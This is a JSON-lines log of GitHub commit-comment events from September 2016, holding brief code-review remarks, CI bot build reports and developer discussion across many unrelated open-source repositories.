{"id":"4508944562","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18881542,"position":null,"line":null,"path":null,"commit_id":"da0b48059e9b068d17b10c0a93febd2fab2cd6b9","created_at":"2016-09-02T14:50:02Z","updated_at":"2016-09-02T14:50:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KNf4VuB7Q8qLXEP1KTHiuA"}},"created_at":"2016-09-02T14:50:02Z"}
{"id":"4508944627","type":"CommitCommentEvent","actor":{"login":"michael-k"},"repo":{"name":"asmaps/blog.asw.io"},"payload":{"comment":{"id":18881543,"position":null,"line":null,"path":null,"commit_id":"9645c5bbd63fb3ce15f68156c343ebe4445c87c3","created_at":"2016-09-02T14:50:03Z","updated_at":"2016-09-02T14:50:03Z","body":"Also noteworthy:\r\n```\r\ndocker volume rm $(docker volume ls -qf dangling=true)\r\n```"}},"created_at":"2016-09-02T14:50:03Z"}
{"id":"4508947585","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18881549,"position":null,"line":null,"path":null,"commit_id":"978727b4cfcc19de56f1e9df386ae447e3611277","created_at":"2016-09-02T14:50:35Z","updated_at":"2016-09-02T14:50:35Z","body":"fast-forwarding develop-2.2 to borshop-integration-671-develop-2.2-job-switches = ff312daf"}},"created_at":"2016-09-02T14:50:35Z"}
{"id":"4508952927","type":"CommitCommentEvent","actor":{"login":"michael-k"},"repo":{"name":"asmaps/blog.asw.io"},"payload":{"comment":{"id":18881558,"position":15,"line":15,"path":"_posts/2016-05-04-docker-gc.md","commit_id":"9645c5bbd63fb3ce15f68156c343ebe4445c87c3","created_at":"2016-09-02T14:51:32Z","updated_at":"2016-09-02T14:51:32Z","body":"Also checkout the `-v, --volumes=true|false` option of `docker rm`."}},"created_at":"2016-09-02T14:51:32Z"}
{"id":"4508954396","type":"CommitCommentEvent","actor":{"login":"iamdoo2"},"repo":{"name":"iamdoo2/dgist"},"payload":{"comment":{"id":18881562,"position":null,"line":null,"path":null,"commit_id":"7a0acc5a5df2a323c35ca0846e7df24a30efbf22","created_at":"2016-09-02T14:51:48Z","updated_at":"2016-09-02T14:51:48Z","body":"아 이거 내가 이렇게 하려고 짰어요. "}},"created_at":"2016-09-02T14:51:48Z"}
{"id":"4508955096","type":"CommitCommentEvent","actor":{"login":"Jeremy-Barnes"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":18881563,"position":14,"line":35,"path":"CritterGames/Breakout/core/src/com/critters/breakout/level/Level.java","commit_id":"f6370fe0998443fab8928b37d3851543628ebffc","created_at":"2016-09-02T14:51:56Z","updated_at":"2016-09-02T14:51:56Z","body":"@ZigaByte make sure that score carries from level to level. Players will need a total score when they finally lose."}},"created_at":"2016-09-02T14:51:56Z"}
{"id":"4508955600","type":"CommitCommentEvent","actor":{"login":"iamdoo2"},"repo":{"name":"iamdoo2/dgist"},"payload":{"comment":{"id":18881565,"position":3,"line":3,"path":"test/controllers/monitor_controller_test.rb","commit_id":"7a0acc5a5df2a323c35ca0846e7df24a30efbf22","created_at":"2016-09-02T14:52:01Z","updated_at":"2016-09-02T14:52:01Z","body":"아 이거 테스트로 짠 코드입니다."}},"created_at":"2016-09-02T14:52:01Z"}
{"id":"4508958152","type":"CommitCommentEvent","actor":{"login":"ssmusoke"},"repo":{"name":"openmrs/openmrs-module-coreapps"},"payload":{"comment":{"id":18881571,"position":null,"line":null,"path":null,"commit_id":"0be6cb0ff22c68fe29ce0829be80519e9645b42a","created_at":"2016-09-02T14:52:28Z","updated_at":"2016-09-02T14:52:28Z","body":"@dkayiwa I am getting this error due to the XSS changes https://gist.github.com/ssmusoke/316ba9e6cd87b70f9864a5d58f06ade5"}},"created_at":"2016-09-02T14:52:28Z"}
{"id":"4508959871","type":"CommitCommentEvent","actor":{"login":"ericek111"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18881576,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T14:52:47Z","updated_at":"2016-09-02T14:52:47Z","body":"I'd completely remove the underline. On my cheapass Windows hax I used to delete the current line and write status with appropriate colors without flooding command line."}},"created_at":"2016-09-02T14:52:47Z"}
{"id":"4508960315","type":"CommitCommentEvent","actor":{"login":"LIANGTJ"},"repo":{"name":"LIANGTJ/hello-world"},"payload":{"comment":{"id":18881577,"position":null,"line":null,"path":null,"commit_id":"5deef45e494384f0809379ddb30c78b14f0835a3","created_at":"2016-09-02T14:52:52Z","updated_at":"2016-09-02T14:52:52Z","body":"ok"}},"created_at":"2016-09-02T14:52:52Z"}
{"id":"4508968866","type":"CommitCommentEvent","actor":{"login":"dmi3yy"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18881593,"position":null,"line":null,"path":null,"commit_id":"f17de0417565f0324adb3f67687cf4a6b839059b","created_at":"2016-09-02T14:54:23Z","updated_at":"2016-09-02T14:54:23Z","body":"yes^ now all ok"}},"created_at":"2016-09-02T14:54:23Z"}
{"id":"4508973537","type":"CommitCommentEvent","actor":{"login":"lorengordon"},"repo":{"name":"plus3it/watchmaker"},"payload":{"comment":{"id":18881596,"position":143,"line":38,"path":"src/watchmaker/logger/__init__.py","commit_id":"ee141849ee08de71e67f5431674bb0e1bbb2b639","created_at":"2016-09-02T14:55:10Z","updated_at":"2016-09-02T14:55:10Z","body":"`os.path.sep.join()`, to avoid the issue on windows with colons..."}},"created_at":"2016-09-02T14:55:10Z"}
{"id":"4508974328","type":"CommitCommentEvent","actor":{"login":"jaymedavis"},"repo":{"name":"jaymedavis/stripe.net"},"payload":{"comment":{"id":18881597,"position":null,"line":null,"path":null,"commit_id":"d44439ea2bfc3266c543368c397531cb657599af","created_at":"2016-09-02T14:55:17Z","updated_at":"2016-09-02T14:55:17Z","body":"I assume you were talking about release notes on GitHub? Let me know if you have any trouble at all with 6.5 - have you upgraded yet?"}},"created_at":"2016-09-02T14:55:17Z"}
{"id":"4508984752","type":"CommitCommentEvent","actor":{"login":"matthiasbeyer"},"repo":{"name":"mario-kr/imag"},"payload":{"comment":{"id":18881626,"position":null,"line":null,"path":null,"commit_id":"513722c24adc7251f298b019e18471f1c249d7ca","created_at":"2016-09-02T14:57:01Z","updated_at":"2016-09-02T14:57:01Z","body":"Did you test this? If yes, did you also test this with subcommands for the subcommands (as in using the subcommand \"notes\" and then the subcommand \"create\" on that -> `imag notes create`)?"}},"created_at":"2016-09-02T14:57:01Z"}
{"id":"4508990677","type":"CommitCommentEvent","actor":{"login":"pferreir"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18881639,"position":51,"line":51,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T14:58:08Z","updated_at":"2016-09-02T14:58:08Z","body":"Remember the discussion we had about JSON fields not being updated automatically?"}},"created_at":"2016-09-02T14:58:08Z"}
{"id":"4508990687","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-coreapps"},"payload":{"comment":{"id":18881640,"position":null,"line":null,"path":null,"commit_id":"0be6cb0ff22c68fe29ce0829be80519e9645b42a","created_at":"2016-09-02T14:58:08Z","updated_at":"2016-09-02T14:58:08Z","body":"@ssmusoke if you are using the snapshot version of coreapps, then you also need to use the snapshot version of the uiframework module."}},"created_at":"2016-09-02T14:58:08Z"}
{"id":"4508993513","type":"CommitCommentEvent","actor":{"login":"jrtom"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":18881645,"position":null,"line":null,"path":null,"commit_id":"cfe05dfda3ba79aa1bd3acce6b4e766eb7b9bc00","created_at":"2016-09-02T14:58:35Z","updated_at":"2016-09-02T14:58:35Z","body":"Regarding {U,V} vs. {A,B}: there's no strong precedent in graph theory, although \"u\" and \"v\" are more common in this sort of context.  We were looking for names for nodeU() and nodeV() that had as weak a connotation of ordering as possible, since in an unordered EndpointPair they basically just mean the nodes at each end of an edge, in arbitrary order.  (We did consider \"chicken()\" and \"egg()\" because of the famous conundrum about which one comes first, but eventually decided against it.  :) )\r\n\r\nRegarding \"Value\": graph theory doesn't really address the sort of thing that we're describing here, which is a graph whose edges have an arbitrary object associated with them.  \r\nWe considered \"Weight\", but that has the connotation of a purely numeric value.\r\nWe also considered \"Label\", but that suggests something intended for visually identifying edges (a text string, an icon, etc.).\r\n\r\nWe hit on \"value\" because the value associated with a key in a Map has the correct association: each key in a Map has a value, and the values can be anything (all the same value, all different, anything in between).\r\nIn this case, the keys are edges (represented in a ValueGraph by EndpointPairs) and the values are...whatever you want them to be, subject to the restriction of being of the type V that you specify when you declare a ValueGraph<N, V>.\r\nThis makes ValueGraph suitable for representing either an edge label, an edge weight, or something more general.\r\n\r\nHope that helps."}},"created_at":"2016-09-02T14:58:35Z"}
{"id":"4508994929","type":"CommitCommentEvent","actor":{"login":"laurenmcguigan"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18881650,"position":null,"line":null,"path":null,"commit_id":"596ca7e363581ea6e76f0d97db2bc8e1ff673285","created_at":"2016-09-02T14:58:51Z","updated_at":"2016-09-02T14:58:51Z","body":"@setriplette Yes it is! Thank you. Her name is Phoebe :)"}},"created_at":"2016-09-02T14:58:51Z"}
{"id":"4508994948","type":"CommitCommentEvent","actor":{"login":"gebner"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18881651,"position":5,"line":8,"path":"core/src/main/resources/logback.xml","commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-02T14:58:51Z","updated_at":"2016-09-02T14:58:51Z","body":"Can you please revert this change?  If you want to change logging settings locally, you can override this file using a `logback-test.xml` in the same directory."}},"created_at":"2016-09-02T14:58:51Z"}
{"id":"4508995771","type":"CommitCommentEvent","actor":{"login":"pferreir"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18881653,"position":4,"line":38,"path":"indico/util/rules.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T14:59:00Z","updated_at":"2016-09-02T14:59:00Z","body":"It used to be `incompatible_with`, missed that while updating the docstrings."}},"created_at":"2016-09-02T14:59:00Z"}
{"id":"4508997822","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18881661,"position":51,"line":51,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T14:59:24Z","updated_at":"2016-09-02T14:59:24Z","body":"assigning always updates, it's just when you modify something inside - and if you set `CAN_POPULATE = True` in the field class then it's included in `populate_obj`"}},"created_at":"2016-09-02T14:59:24Z"}
{"id":"4508998430","type":"CommitCommentEvent","actor":{"login":"Aetles"},"repo":{"name":"olefredrik/FoundationPress"},"payload":{"comment":{"id":18881664,"position":16,"line":16,"path":".babelrc","commit_id":"9e83b23b346675afa5dc0e2a5d34e8b07fd28bc1","created_at":"2016-09-02T14:59:30Z","updated_at":"2016-09-02T14:59:30Z","body":"@colin-marshall I'm curious about this `compact` set to `false`, is it better than default for FoundationPress?"}},"created_at":"2016-09-02T14:59:30Z"}
{"id":"4509001687","type":"CommitCommentEvent","actor":{"login":"ssmusoke"},"repo":{"name":"openmrs/openmrs-module-coreapps"},"payload":{"comment":{"id":18881670,"position":null,"line":null,"path":null,"commit_id":"0be6cb0ff22c68fe29ce0829be80519e9645b42a","created_at":"2016-09-02T15:00:05Z","updated_at":"2016-09-02T15:00:05Z","body":"@dkayiwa Thanks will update that "}},"created_at":"2016-09-02T15:00:05Z"}
{"id":"4509001996","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18881672,"position":null,"line":null,"path":null,"commit_id":"3d59261fab551b6c844e5af351ddeed3f86a509d","created_at":"2016-09-02T15:00:09Z","updated_at":"2016-09-02T15:00:09Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-127/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-02T15:00:09Z"}
{"id":"4509004285","type":"CommitCommentEvent","actor":{"login":"loewenheim"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18881677,"position":5,"line":8,"path":"core/src/main/resources/logback.xml","commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-02T15:00:31Z","updated_at":"2016-09-02T15:00:31Z","body":"Oh dear, apparently I misread the instructions. Sorry about this, I'll revert it."}},"created_at":"2016-09-02T15:00:31Z"}
{"id":"4509009092","type":"CommitCommentEvent","actor":{"login":"fiatjaf"},"repo":{"name":"formspree/formspree"},"payload":{"comment":{"id":18881687,"position":29,"line":64,"path":"formspree/forms/helpers.py","commit_id":"d1d884ccee3b1e7969fc22e358de0f5f40f273ad","created_at":"2016-09-02T15:01:22Z","updated_at":"2016-09-02T15:01:22Z","body":"Is 5bf9992ec4344cb2f560eb288d9ce8a577748555 good enough, @rohitdatta? I don't understand how I made that change before, so please take a look here before I commit another mistake."}},"created_at":"2016-09-02T15:01:22Z"}
{"id":"4509013590","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18881704,"position":null,"line":null,"path":null,"commit_id":"0b8c4445c3d1781a68747acc0f07eebae25e14e1","created_at":"2016-09-02T15:02:07Z","updated_at":"2016-09-02T15:02:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 907](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12420&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T15:02:07Z"}
{"id":"4509013836","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18881706,"position":null,"line":null,"path":null,"commit_id":"9584f93594dbcad61fccc43e1c276c5dd58ebadf","created_at":"2016-09-02T15:02:10Z","updated_at":"2016-09-02T15:02:10Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32194/testReport/) for this commit**"}},"created_at":"2016-09-02T15:02:10Z"}
{"id":"4509017391","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"jbaiter/gphoto2-cffi"},"payload":{"comment":{"id":18881719,"position":6,"line":6,"path":"gphoto2cffi/__init__.py","commit_id":"4c719df905d89d8936ca37bc999941a4d6e14f75","created_at":"2016-09-02T15:02:47Z","updated_at":"2016-09-02T15:02:47Z","body":"`__version__` also needs to be added to `__all__` @jbaiter, it's not being exposed now."}},"created_at":"2016-09-02T15:02:47Z"}
{"id":"4509024463","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18881732,"position":5,"line":40,"path":"public/assets/lang/lang-en_US.json","commit_id":"84ff7905d3e8d6b273119c24be74ec9c5704d156","created_at":"2016-09-02T15:04:07Z","updated_at":"2016-09-02T15:04:07Z","body":"@doomsayer2 are you sure that's a legitimate spelling?"}},"created_at":"2016-09-02T15:04:07Z"}
{"id":"4509025135","type":"CommitCommentEvent","actor":{"login":"damiracodelolapi"},"repo":{"name":"damiracodelolapi/telegram"},"payload":{"comment":{"id":18881734,"position":null,"line":null,"path":null,"commit_id":"f2cb1de8fe129c53a6437b1cfb4a4979e7d577cb","created_at":"2016-09-02T15:04:14Z","updated_at":"2016-09-02T15:04:14Z","body":"author important ,where ideology particular conversation particular where enemies important to match project based on leadership where selecting where enemies finally dreamed to bring political project based on where author styling particular leadership "}},"created_at":"2016-09-02T15:04:14Z"}
{"id":"4509030743","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"xerial/snappy-java"},"payload":{"comment":{"id":18881745,"position":null,"line":null,"path":null,"commit_id":"6d22a5a1144856b3a69fb02768ffeff6a3f388ac","created_at":"2016-09-02T15:05:14Z","updated_at":"2016-09-02T15:05:14Z","body":"Why this commit has been reverted?"}},"created_at":"2016-09-02T15:05:14Z"}
{"id":"4509031915","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18881747,"position":74,"line":121,"path":"public/assets/lang/lang-en_US.json","commit_id":"84ff7905d3e8d6b273119c24be74ec9c5704d156","created_at":"2016-09-02T15:05:26Z","updated_at":"2016-09-02T15:05:26Z","body":"@doomsayer2 I think it's without the apostrophe because its plural?"}},"created_at":"2016-09-02T15:05:26Z"}
{"id":"4509032759","type":"CommitCommentEvent","actor":{"login":"mario-kr"},"repo":{"name":"mario-kr/imag"},"payload":{"comment":{"id":18881748,"position":null,"line":null,"path":null,"commit_id":"513722c24adc7251f298b019e18471f1c249d7ca","created_at":"2016-09-02T15:05:34Z","updated_at":"2016-09-02T15:05:34Z","body":"Test? What's that? It built and i could make the same calls as before. The bug persists, that why i commented that i'd maybe do some debugging.\r\nThis commit could be categorizes as \"refactor\", as functionality stayed the same."}},"created_at":"2016-09-02T15:05:34Z"}
{"id":"4509034539","type":"CommitCommentEvent","actor":{"login":"agross"},"repo":{"name":"GregOnNet/dotfiles"},"payload":{"comment":{"id":18881754,"position":5,"line":9,"path":"git/tools/diffmerge-merge","commit_id":"32b2811998e9b2dcf24c1591dc8a3f5df63a64b4","created_at":"2016-09-02T15:05:52Z","updated_at":"2016-09-02T15:05:52Z","body":"Using `$OSTYPE` is cheaper than running a new process."}},"created_at":"2016-09-02T15:05:52Z"}
{"id":"4509034775","type":"CommitCommentEvent","actor":{"login":"gebner"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18881755,"position":null,"line":null,"path":null,"commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-02T15:05:54Z","updated_at":"2016-09-02T15:05:54Z","body":"For me, all tests run without failure.  What error do you get?"}},"created_at":"2016-09-02T15:05:54Z"}
{"id":"4509039424","type":"CommitCommentEvent","actor":{"login":"mvdbeek"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":18881771,"position":15,"line":806,"path":"lib/galaxy/config.py","commit_id":"9f7c749638340fb63ac00a417a9e328875296885","created_at":"2016-09-02T15:06:43Z","updated_at":"2016-09-02T15:06:43Z","body":"@jmchilton don't you need to break the loop when the toolbox has reloaded?"}},"created_at":"2016-09-02T15:06:43Z"}
{"id":"4509041369","type":"CommitCommentEvent","actor":{"login":"agross"},"repo":{"name":"GregOnNet/dotfiles"},"payload":{"comment":{"id":18881782,"position":17,"line":41,"path":"zsh/lib/aliases.zsh","commit_id":"912639f767a48f1724b38de72632c77e33b6eeeb","created_at":"2016-09-02T15:07:05Z","updated_at":"2016-09-02T15:07:05Z","body":"Probably overwritten by https://github.com/agross/dotfiles/blob/master/ruby/aliases.zsh#L9"}},"created_at":"2016-09-02T15:07:05Z"}
{"id":"4509042634","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18881787,"position":5,"line":40,"path":"public/assets/lang/lang-en_US.json","commit_id":"84ff7905d3e8d6b273119c24be74ec9c5704d156","created_at":"2016-09-02T15:07:18Z","updated_at":"2016-09-02T15:07:18Z","body":"@doomsayer2 @abisz I would say we stick with the unhyphenated version and only the first letter uppercase (where necessary, like in this case)"}},"created_at":"2016-09-02T15:07:18Z"}
{"id":"4509042791","type":"CommitCommentEvent","actor":{"login":"agross"},"repo":{"name":"GregOnNet/dotfiles"},"payload":{"comment":{"id":18881789,"position":12,"line":36,"path":"zsh/lib/aliases.zsh","commit_id":"912639f767a48f1724b38de72632c77e33b6eeeb","created_at":"2016-09-02T15:07:19Z","updated_at":"2016-09-02T15:07:19Z","body":"`$OSTYPE`"}},"created_at":"2016-09-02T15:07:19Z"}
{"id":"4509043469","type":"CommitCommentEvent","actor":{"login":"dirmeier"},"repo":{"name":"dirmeier/Rcpp"},"payload":{"comment":{"id":18881792,"position":null,"line":null,"path":null,"commit_id":"993474955fbc881e44b4077bf6c1cbcb99b29a85","created_at":"2016-09-02T15:07:26Z","updated_at":"2016-09-02T15:07:26Z","body":"According to http://stackoverflow.com/questions/228783/what-are-the-rules-about-using-an-underscore-in-a-c-identifier/228797#228797 leading underscores should be avoided. \r\n\r\n> Each name that contains a double underscore (_ _) or **begins with an underscore followed by an uppercase letter** (2.11) is reserved to the implementation for any use.\r\n\r\nSee our discussion on: http://stackoverflow.com/questions/39291133/how-to-change-header-include-guards-in-rcpp-interfaces/39291326?noredirect=1#comment65919759_39291326\r\n\r\n\r\n"}},"created_at":"2016-09-02T15:07:26Z"}
{"id":"4509046570","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18881807,"position":null,"line":null,"path":null,"commit_id":"e420407d4d43944d4287bac570c23e2b237d9495","created_at":"2016-09-02T15:08:00Z","updated_at":"2016-09-02T15:08:00Z","body":"This was for #444."}},"created_at":"2016-09-02T15:08:00Z"}
{"id":"4509062837","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18881854,"position":null,"line":null,"path":null,"commit_id":"0b8c4445c3d1781a68747acc0f07eebae25e14e1","created_at":"2016-09-02T15:10:55Z","updated_at":"2016-09-02T15:10:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 907](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12420&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 244, ignored: 3 Build time: 00:08:48"}},"created_at":"2016-09-02T15:10:55Z"}
{"id":"4509066880","type":"CommitCommentEvent","actor":{"login":"mdbenito"},"repo":{"name":"breze-no-salt/breze"},"payload":{"comment":{"id":18881861,"position":null,"line":null,"path":null,"commit_id":"86844de90b960b825ac1a3c472b372a2d675f6b8","created_at":"2016-09-02T15:11:40Z","updated_at":"2016-09-02T15:11:40Z","body":"Hi, I'm trying to run the DVBF notebook but the data files are missing (e.g. 'pendulum.pkl.gz'). Could you please share them? Thanks!"}},"created_at":"2016-09-02T15:11:40Z"}
{"id":"4509069019","type":"CommitCommentEvent","actor":{"login":"matthiasbeyer"},"repo":{"name":"mario-kr/imag"},"payload":{"comment":{"id":18881869,"position":null,"line":null,"path":null,"commit_id":"513722c24adc7251f298b019e18471f1c249d7ca","created_at":"2016-09-02T15:12:04Z","updated_at":"2016-09-02T15:12:04Z","body":"> Test? What's that?\r\n\r\n:smile: I meant trying the commands on the commandline! :smile: \r\n\r\n> This commit could be categorizes as \"refactor\", as functionality stayed the same.\r\n\r\nAh, okay. Feel free to do your thing and then file a PR onto my PR! :+1: "}},"created_at":"2016-09-02T15:12:04Z"}
{"id":"4509069334","type":"CommitCommentEvent","actor":{"login":"MockbaTheBorg"},"repo":{"name":"MockbaTheBorg/RunCPM"},"payload":{"comment":{"id":18881870,"position":null,"line":null,"path":null,"commit_id":"f5ae2c04cbbceeeb367e275dbec7b0c43ee88938","created_at":"2016-09-02T15:12:08Z","updated_at":"2016-09-02T15:12:08Z","body":"Reverted this for now as it broke too many things. Will re-do it slowly piece by piece."}},"created_at":"2016-09-02T15:12:08Z"}
{"id":"4509085594","type":"CommitCommentEvent","actor":{"login":"pjsong"},"repo":{"name":"pjsong/angular2-hero-steps"},"payload":{"comment":{"id":18881910,"position":null,"line":null,"path":null,"commit_id":"c79ebe58300dfc347f1b338ba56dba2ab4a32ee7","created_at":"2016-09-02T15:15:05Z","updated_at":"2016-09-02T15:15:05Z","body":"step1"}},"created_at":"2016-09-02T15:15:05Z"}
{"id":"4509090299","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18881922,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T15:15:55Z","updated_at":"2016-09-02T15:15:55Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2326 of 2327 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T15:15:55Z"}
{"id":"4509091256","type":"CommitCommentEvent","actor":{"login":"tienthanhdhcn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18881924,"position":538,"line":666,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"838fea4298b79acfac07447d8328a4672b583667","created_at":"2016-09-02T15:16:04Z","updated_at":"2016-09-02T15:16:04Z","body":"Conflict"}},"created_at":"2016-09-02T15:16:04Z"}
{"id":"4509091528","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18881925,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T15:16:08Z","updated_at":"2016-09-02T15:16:08Z","body":"@mstembera: another possibility would be to use an addition instead of max:\r\n````\r\n   e->kqImbalance = abs(wQP - bQP) + abs(wKP - bKP);\r\n````\r\nand probably compensate with the weight or the additive constant in initiative().\r\n\r\nI think it it an important series, because the ideas in these patches try to avoid the \"drawish tendency\" of endgames where one of the flanks is completely liquidated. Good luck, you'll get it! :-)\r\n"}},"created_at":"2016-09-02T15:16:08Z"}
{"id":"4509091712","type":"CommitCommentEvent","actor":{"login":"khuston"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":18881926,"position":96,"line":256,"path":"package/MDAnalysis/topology/LAMMPSParser.py","commit_id":"24edfaa78e119f453050adc586c42c5030143d57","created_at":"2016-09-02T15:16:11Z","updated_at":"2016-09-02T15:16:11Z","body":"@richardjgowers I think the Lammps data parser regressed here in one aspect -- before this commit, the parser could handle inclusion of image flags, which sometimes follow the x,y,z positions. After the commit, the position parser blindly reads the last 3 numbers on the line as the positions, even if they are image flags. Should I submit a PR to fix this in the issue-363 branch? "}},"created_at":"2016-09-02T15:16:11Z"}
{"id":"4509095752","type":"CommitCommentEvent","actor":{"login":"loewenheim"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18881937,"position":null,"line":null,"path":null,"commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-02T15:16:53Z","updated_at":"2016-09-02T15:16:53Z","body":"A match error where a `Some` is extracted. Before this, my work computer runs for quite a while though. I'll try it at home later! "}},"created_at":"2016-09-02T15:16:53Z"}
{"id":"4509098460","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":18881940,"position":96,"line":256,"path":"package/MDAnalysis/topology/LAMMPSParser.py","commit_id":"24edfaa78e119f453050adc586c42c5030143d57","created_at":"2016-09-02T15:17:22Z","updated_at":"2016-09-02T15:17:22Z","body":"Ah yeah, that would be good"}},"created_at":"2016-09-02T15:17:22Z"}
{"id":"4509101729","type":"CommitCommentEvent","actor":{"login":"DanBurton"},"repo":{"name":"fpco/stackage"},"payload":{"comment":{"id":18881945,"position":null,"line":null,"path":null,"commit_id":"fc80cc5ca9d5a7feb1a76e101b294a7aabdb0197","created_at":"2016-09-02T15:17:59Z","updated_at":"2016-09-02T15:17:59Z","body":"No problemo :+1:"}},"created_at":"2016-09-02T15:17:59Z"}
{"id":"4509103143","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18881950,"position":null,"line":null,"path":null,"commit_id":"5d4225117607c932f614bea7a20004fe5eecdecd","created_at":"2016-09-02T15:18:16Z","updated_at":"2016-09-02T15:18:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 908](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12430&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T15:18:16Z"}
